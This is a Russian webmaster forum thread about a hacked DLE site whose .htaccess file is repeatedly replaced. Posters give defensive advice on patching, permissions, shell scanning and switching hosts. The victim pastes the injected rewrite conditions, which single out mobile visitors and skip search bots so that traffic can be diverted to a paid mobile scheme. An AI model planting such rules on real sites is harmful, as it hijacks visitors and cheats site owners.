Заменяют файл .htaccess! Как защитить?

[satka]

Недавно обнаружил левые страницы на сайте, все лишние php файлы почистил, поменял пароли на админку и FTP.Но все равно регулярно заменяют файл .htaccess на другой. Каким образом можно защитить от смены этого файла? Права стоят только на чтение, но после изменения права сами меняются на запись.

 

[WebSet]

satka,Поставить все патчи безопасности, которые не были установлены.Создать .htaccess от Root пользователя или же изменить на 444 права, спс DeViL

 

[DeViL]

Цитата: WebSetна 644 права444

 

[WebSet]

Антивирусом проверь внутренним через админку, глянь подозрительные файлы.А так же меняй хостинг.

 

[realnonet]

Так как слив (отбирают ваш траф) идет на мобильный платник, пробивайте чья пп и пишите туда с жалобами и угрозами что такой мудак (его ссылку прикрепите) занимается взломом сайтов и сливает траф. Должны заблочить, если токо пп не черная. И попросите его данные.Да, и создайте похожий топик на серче и укажите там ссылку куда идет траф.

 

[satka]

я ставлю 444, не помогаетМеняют вот на этоRewriteCond %{HTTP_USER_AGENT} acs [NC,OR]RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]RewriteCond %{HTTP_USER_AGENT} java [NC,OR]RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]RewriteCond %{HTTP_USER_AGENT} play [NC,OR]RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]RewriteCond %{HTTP_USER_AGENT} port [NC,OR]RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]RewriteCond %{HTTP_USER_AGENT} send [NC,OR]RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]RewriteCond %{HTTP_USER_AGENT} android [NC,OR]RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtmlxml" [NC,OR]RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]RewriteCond %{HTTP_USER_AGENT} !bsd [NC]RewriteCond %{HTTP_USER_AGENT} !x11 [NC]RewriteCond %{HTTP_USER_AGENT} !unix [NC]RewriteCond %{HTTP_USER_AGENT} !macos [NC]RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]RewriteCond %{HTTP_USER_AGENT} !playstation [NC]RewriteCond %{HTTP_USER_AGENT} !google [NC]RewriteCond %{HTTP_USER_AGENT} !yandex [NC]RewriteCond %{HTTP_USER_AGENT} !bot [NC]RewriteCond %{HTTP_USER_AGENT} !libwww [NC]RewriteCond %{HTTP_USER_AGENT} !msn [NC]RewriteCond %{HTTP_USER_AGENT} !america [NC]RewriteCond %{HTTP_USER_AGENT} !avant [NC]RewriteCond %{HTTP_USER_AGENT} !download [NC]RewriteCond %{HTTP_USER_AGENT} !fdm [NC]RewriteCond %{HTTP_USER_AGENT} !maui [NC]RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

 

[WebSet]

satka,http://dle-news.ru/bags/Я же сказал поставь баг фиксы последние.

 

[леший]

satka,Сайт на хостинге или на vps/сервере? Если на хостинге, то не обязательно, что ломают именно через ваш аккаунт. Если же на vps/сервере то советую удалить FTP сервер, сменить порт и пароль для SHH, отключить панели (ISP и т.д.) ну и пропатчить саму cms.

 

[GolDer]

да уже наверняка шелл где то валяется

 

[satka]

WebSet, у меня версия 9.8, все патчи поставиллеший, сайт на хостинге Agava

 

[леший]

Цитата: satkaлеший, сайт на хостингеЦитата: лешийне обязательно, что ломают именно через ваш аккаунт.если это так, то вариант один, менять хостинг. Просите у ТП логи с датой и временем обновления .htaccess файла

 

[satka]

у меня 5 сайтов стоят на majordomo, все на DLE, такой проблемы нет, может реально дело в хостере...

 

[priplili]

Оффтоп:Как-то помню написали в htaccess в комментариях, что если ещё раз файл исправлю, то подадут в суд. Попробуй, может прокатит

 

[dyakoff]

ai-bolit чекай на шеллыну и в качестве бреда chattr +i .htaccess